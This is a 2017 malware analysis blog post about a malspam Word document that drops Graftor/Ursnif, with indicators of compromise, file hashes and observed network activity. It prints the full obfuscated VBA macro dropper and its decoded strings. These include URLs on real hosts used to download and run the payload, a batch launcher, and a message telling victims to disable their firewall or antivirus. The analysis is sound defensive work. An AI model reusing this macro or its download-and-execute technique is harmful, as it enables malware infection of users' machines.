2017-04-03 Malspam leading to Graftor/Ursnif

Monday there was a file sent via email to an employee with a maldoc attached to it. The maldoc was encrypted and used the password of 3443 to unlock it. Once you unlocked the document, it asked to enable macros. It is from here that this analysis starts. This infection chain seems very close to the one that Sophos had reported on here in this link. Like the test done in the Sophos article, I was not able to get any callback traffic generated on my test VM.

Based on the Virustotal and Hybrid-Analysis links and the article from Sophos, this is falling under the Graftor/Ursnif family of malware.

Like always, for the artifacts from this investigation, please see my repo here.

Indicators of Compromise:
=========================
truhlarna-macura.cz:80/ 95.168.206.199
www.solidaridadsolar.com:80 / 134.0.11.204
aemquality.com:80 / 50.62.103.1
21.12.44.23 (ICMP)

Artifacts:
==========
File name: 03167.exe
File path: C:\Users\%username%\AppData\Local\Temp
File size: 207KB
MD5 hash: 8443bc47a982d6c5761d3182415e48e4
Virustotal: http://virustotal.com/en/file/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689/analysis/
First detection: 2017-04-03 10:21:40 UTC
Detection Ratio: 8 / 61
Malwr: http://malwr.com/analysis/ZmE2YjI1ZTAzNzEzNGMxOWE3MmZiY2JmNWU3ODY0MjA/ and http://malwr.com/analysis/ZTgzY2U4YzMyNTNmNDI3OWFlNzk0ZWM0MWJlMjgzNTc/
Hybrid Analysis: http://www.hybrid-analysis.com/sample/2e013cc6c8419e26df4ec35edfcb5017f38b661e98534e2fddfd3bc21120c689?environmentId=100

File name: 03167.tmp
File path: C:\Users\%username%\AppData\Local\Temp
File size: 207KB
MD5 hash: 0efa064779ccb639a07fc1ae088e04ff
Virustotal: NA
Malwr: NA
Hybrid Analysis: NA

File name: 03167.cmd
File path: C:\Users\%username%\AppData\Local\Temp
File size: 98KB
MD5 hash: a27604e68dafb7ceaadd6354d7c82c4a
Virustotal: NA
Malwr: NA
Hybrid Analysis: NA

File name: logo[1].gif
File path: C:\Users\%username%\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8LBPK0D0\logo[1].gif
File size: 207KB
MD5 hash: 0efa064779ccb639a07fc1ae088e04ff
Virustotal: NA
Malwr: NA
Hybrid Analysis: NA

File name: fili.exe
File path: C:\Users\%username%\AppData\Local\Dawu\fili.exe
File size: 612KB
MD5 hash: 7e7229ba9b4047f8471c53e4f8800908
Virustotal: NA
Malwr: NA
Hybrid Analysis: NA

File name: id.dat
File size: 612KB
MD5 hash: 7e7229ba9b4047f8471c53e4f8800908
Virustotal: http://virustotal.com/en/file/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076/analysis/
First detection: 2017-04-03 13:57:27 UTC
Detection ratio: 36 / 61
Malwr: NA
Hybrid Analysis: http://www.hybrid-analysis.com/sample/214b277cfe3d2f6bfbe52117733806cc4cb0925db908d6ddc8b1da6a43fff076?environmentId=100

Analysis of Malware:
====================
As mentioned above the user received the below email that contained a malicious Word document that was encrypted to get around any sandboxing analysis.

Once the Word document is downloaded, the file opened, and macros enabled the Word doc displays a message stating that it is checking the status of the SSL certificate for a few seconds. After that we get the same pop-up that Sophos mentioned – that the file is corrupted and cannot be opened. Once you click on “OK,” the Word document is closed. Now for the average user, they would not think anything of this, but it is what happens after a minute or so that gives a hint of something nefarious going on stemming from this Word document. There is a Windows popup stating that the process “0484A.exe has stopped working” as seen below.

Starting from the network side of this infection, once the Word document is run, there is a call to the site truhlarna-macura[.]cz requesting a GIF file.

Looking at the request, you can see that the supposed GIF file is 207114 bytes, which seems to match up to the actual GIF file size, and some of the other binary files that are dropped on to the system (03167.exe/03167.tmp).

Next we see an old trick to help defeat sandboxing techniques – a PING request to 21.12.44.23. This IP address belong to DoD based on Robtex: http://www.robtex.com/?ip=21.12.44.23&whois=1.

NetRange:	21.0.0.0 - 21.255.255.255
CIDR:	21.0.0.0/8
NetName:	DNIC-SNET-021
NetHandle:	NET-21-0-0-0-1
Parent:	()
NetType:	Direct Allocation
OriginAS:	
Organization:	DoD Network Information Center (DNIC)
RegDate:	1991-07-01
Updated:	2009-06-19
Ref:	http://whois.arin.net/rest/net/NET-21-0-0-0-1

We also see a request for Github too, but I am not sure what transpired here since this is over SSL.

We then see a call to the site www[.]solidaridadsolar[.]com which must have been cleaned up by the time I ran this on my test VM (and could explain part of the reason why nothing else happened on the VM).

And then lastly a call to aemquality[.]com to get a file called “id.dat.”

From the host side of things, this was a pretty straight forward infection. Once the Word document is run, the VB script is executed and we can assume that it makes the request to download the malicious “GIF” file. We also see that Word creates a new CMD process which in turn creates a batch file called “03137.cmd.” While the GIF file is striping out the malicious binary file, the batch file is doing a PING to the IP address of 21.12.44.23 and also to execute the 03137.exe binary.

@echo off
ping 21.12.44.23 -n 1 -w 2000 > NUL
start C:\Users\Bill\AppData\Local\Temp\03167.exe

Once the 03137.exe binary is started, it starts going through the system looking at various things on the filesystem and within the registry (with a heavy emphasis when looking at registry keys related to certificates). It then creates the file called “fili.exe” and it starts to execute that file. This file, like the 03137.exe file looks at various things on the system (filesystem and registry) and after a bit terminates causing a system fault (the error message that pops up after a minute once the Word document has been closed). From there everything shuts down and no further activity is seen.

Since I was not able to get much further from here, I asked one of my colleagues to take a look and see if he was able to get it to go further. Thankfully he was able to and also shared with me an interesting tip that I was not aware of – saving the encrypted Word document as a new file and deleting the password from it as seen below.

Once I did that, I was able to get to the script using OfficeMalDoc and extracting out the file that (granted you can also just extract the files out from the Word doc since it is another example of an archive).

Below is the VBA script from the Word document.

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
#If VBA7 And Win64 Then
Private Declare PtrSafe Function uhodixi Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As LongLong
Private Declare PtrSafe Function ocabype Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare PtrSafe Function hogezij Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare PtrSafe Function egawomy Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#Else
Private Declare Function uhodixi Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal Operation As String, ByVal Filename As String, Optional ByVal Parameters As String, Optional ByVal Directory As String, Optional ByVal WindowStyle As Long = vbMaximizedFocus) As Long
Private Declare Function ocabype Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
Private Declare Function hogezij Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpszPath As String, ByVal lpPrefixString As String, ByVal wUnique As Long, ByVal lpTempFileName As String) As Long
Private Declare Function egawomy Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
#End If

Sub Document_Open()

Dim pupujoh As String
Dim neqizuv As String
Dim asajuko As Long
Dim xeryxeb As Long
Dim etopedo As Integer
Dim yqaluqe() As Byte
Dim qilogyb As Object
Dim alugumi As Object
      
#If Win64 Then
Dim fysisin As LongLong
#Else
Dim fysisin As Long
#End If

ActiveDocument.Content.Delete
ActiveDocument.PageSetup.LeftMargin = 240
ActiveDocument.PageSetup.TopMargin = 100

Set myRange = ActiveDocument.Content

With myRange.Font
 .Name = acuzamu("P~})sbs")
 .Size = 14
End With
ActiveDocument.Range.Text = acuzamu("ZU~5O-11g-5~}h;Y;5sh~""") & vbLf & acuzamu("-----iR~s<~-Js;h""""""")

DoEvents
DoEvents
DoEvents
DoEvents
DoEvents

pupujoh = esecana
asajuko = egawomy(0, acuzamu("UhhWQHHh}0URs}bs*8s50}s""5!H;8vHR(v(""v;Y"), pupujoh, 0, 0)
xeryxeb = FileLen(pupujoh)

If asajuko <> 0 And xeryxeb < 183927 Then
asajuko = egawomy(0, acuzamu("UhhWQHHv0s8sh~b""5(8HW}0~dsHR(v(""v;Y"), pupujoh, 0, 0)
xeryxeb = FileLen(pupujoh)
End If

If asajuko <> 0 And xeryxeb < 175274 Then
asajuko = egawomy(0, acuzamu("UhhWQHHW}~Y8sF0s""5(8Hf50<0);HR(v(""v;Y"), pupujoh, 0, 0)
xeryxeb = FileLen(pupujoh)
End If

If xeryxeb < 179218 Then
ActiveDocument.Content.Delete
MsgBox acuzamu("B(-;bh~}b~h-s55~<<""-?0}b-(YY-sbq-Y;}~JsRR-(}-sbh;*N;}0<-<(YhJs}~-sb)-h}q-svs;b"""), vbCritical, acuzamu("I}}(}")
Application.Quit SaveChanges:=0
Exit Sub
End If

etopedo = FreeFile
Open pupujoh For Binary As #etopedo
ReDim yqaluqe(0 To LOF(etopedo) - 1)
Get #etopedo, , yqaluqe()
Close #etopedo
  
Call ejynebe(yqaluqe())

pupujoh = Left(pupujoh, Len(pupujoh) - 3)
pupujoh = pupujoh & acuzamu("~ ~")

neqizuv = Left(pupujoh, Len(pupujoh) - 3)
neqizuv = neqizuv & acuzamu("58)")

etopedo = FreeFile
Open pupujoh For Binary As #etopedo
Put #etopedo, , yqaluqe()
Close #etopedo
 
ActiveDocument.Content.Delete
MsgBox acuzamu("?U~-Y;R~-;<-5(}}0Wh~)-sb)-5sbb(h-d~-(W~b~)"), vbCritical, acuzamu("I}}(}")

Set qilogyb = CreateObject(acuzamu("15};Wh;bv"",;R~1q<h~8[dx~5h"))
Set alugumi = qilogyb.CreateTextFile(neqizuv)
alugumi.WriteLine acuzamu("u~5U(-(YY")
alugumi.WriteLine acuzamu("W;bv-G2""2G""@@""G=-*b-2-*J-G```-'-B6g")
alugumi.WriteLine acuzamu("<hs}h-") & pupujoh
alugumi.Close

fysisin = uhodixi(0, acuzamu("[W~b"), neqizuv, 0, 0, 6)
Application.Quit SaveChanges:=0
End Sub


Public Function esecana() As String
  Dim ezytate As String * 312
  Dim jymyryq As String * 618
  Dim ivecaco As Long
  Dim ymohoba As String
  
  ivecaco = ocabype(312, ezytate)
  If (ivecaco > 0 And ivecaco < 312) Then
    ivecaco = hogezij(ezytate, 0, 0, jymyryq)
    If ivecaco <> 0 Then
        ymohoba = Left$(jymyryq, InStr(jymyryq, vbNullChar) - 1)
    End If
    esecana = ymohoba
  End If
End Function

Public Sub ejynebe(yqaluqe() As Byte)
  Dim eqoneji As Long
  Dim esyjato As Long
  Dim norixec As Long
  Dim ugagoqo(256) As Byte
  Dim zynebit As Long
  Dim yzetyso As Long
  
   
  esyjato = UBound(yqaluqe) + 1
  
  For eqoneji = 10 To 265
    ugagoqo(eqoneji - 10) = yqaluqe(eqoneji)
  Next
  
  zynebit = UBound(ugagoqo) + 1
  
  yzetyso = 0
  For eqoneji = 266 To (esyjato - 1)
    yqaluqe(eqoneji - 266) = yqaluqe(eqoneji) Xor ugagoqo(yzetyso)
    yzetyso = yzetyso + 1
    
    If yzetyso = (zynebit - 1) Then
        yzetyso = 0
    End If
  Next
  
  ReDim Preserve yqaluqe(esyjato - 267)
  
End Sub

Public Function acuzamu(ByVal moluhyp As String) As String
  Dim begozat(256)
  Dim abuvuba As String
  Dim ijuhoqe As Long
  Dim korupaj As String
 
abuvuba = "xz.~^7;>od-DF )}uS1[=cU`mGWis3MT4{N%9Zq2/Ew(&+vkV:l\!hKp8fCOAR6?0|nYbI_LtPB'H<Q$Xy""aJ@g#j5],*re"
  For ijuhoqe = 1 To Len(abuvuba)
  begozat(ijuhoqe + 31) = Mid(abuvuba, ijuhoqe, 1)
  Next ijuhoqe
  
  For ijuhoqe = 1 To Len(moluhyp)
  korupaj = Mid(moluhyp, ijuhoqe, 1)
  acuzamu = acuzamu & begozat(Asc(korupaj))
  Next ijuhoqe
End Function

Looking at the script, it looks like the decryption function is the acuzamu function since we see that function being called several times throughout the script. Unfortunately I was not able to get the strings deobfuscated from the script, but my colleague was able to. Here is what he found when deobfuscating the script:

Verdana
Check SSL certificate.
     Please wait...
http://truhlarna-macura.cz/img/logo.gif
http://guamaten.com/prueba/logo.gif
http://prefmaqua.com/_cusudi/logo.gif
No internet access. Turn off any firewall or anti-virus software and try again.
The file is corrupted and cannot be opened
Scripting.FileSystemObject
@echo off
ping 21.12.44.23 -n 1 -w 2000 > NUL
start
Scripting.FileSystemObject

He also noted that the GIF, once decoded to an executable, makes a network call to some well known sites such as instagram, github, and linkedin. We are assuming that this is another network connectivity check. Lastly, he also noted that the file “id.dat”¬†was another executable binary as well which makes sense since it, and the file called “fili.exe” have the same MD5 hash. I am assuming that this file, like the GIF, is being converted into a binary (in this case via the 03167.exe file/process). When I was writing this up yesterday there was nothing listed for the id.dat file in Hybrid Analysis or in Virustotal. This morning when reading his notes, he noted that there were now hits for the MD5 (which has been updated above for id.dat).

Leave a Reply

Your email address will not be published. Required fields are marked *